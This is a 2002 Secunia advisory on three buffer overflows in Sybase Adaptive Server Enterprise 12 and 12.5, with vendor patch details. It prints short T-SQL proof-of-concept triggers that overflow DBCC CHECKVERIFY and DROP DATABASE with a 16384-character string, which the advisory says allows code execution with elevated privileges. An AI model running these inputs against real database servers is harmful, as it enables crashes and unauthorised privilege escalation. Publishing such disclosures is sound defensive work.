|
Sybase privilege escalation
|
|
Secunia Advisory:
|
SA7620
|
|
|
Release Date:
|
2002-11-28
|
|
Popularity:
|
5,902 views
|
|
|
Critical:
|
 Moderately critical
|
|
Impact:
|
Privilege escalation
|
|
Where:
|
Local system
|
|
Solution Status:
|
Vendor Patch
|
|
| Software: | Sybase Adaptive Server Enterprise 12.x
|
|
|
Subscribe:
|
Instant alerts on relevant vulnerabilities
|
|
Description: Sybase Adaptive Server 12 and 12.5 has three different flaws allowing non-privileged users to gain privileges.
By passing an argument of more than 45 characters to xp_freedll a buffer overflow is caused.
The DBCC CHECKVERIFY buffer overflow:
declare @test varchar(16384)
select @test = replicate('A', 16384)
DBCC CHECKVERIFY(@test)
go
The DROP DATABASE buffer overflow
declare @test varchar(16384)
select @test = replicate('A', 16384)
DROP DATABASE @test
go
All buffer overflows can be abused to execute arbitrary code with elevated privileges.
Solution: Apply patches:
12.5.0.2 - 11/14/2002
12.0.0.6 ESD#1 - 11/5/2002
http://downloads.sybase.com/swd/swx
Provided and/or discovered by: Aaron C. Newman, Application Security Inc
|
|
|
Track this Secunia Advisory
|
Customers of the Secunia Vulnerability Intelligence solutions will automatically receive updates when new information regarding this advisory is released.
Read more about our Vulnerability Intelligence solutions and what they can do for you and your company.
|
|
|
About this Secunia Advisory
|
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
|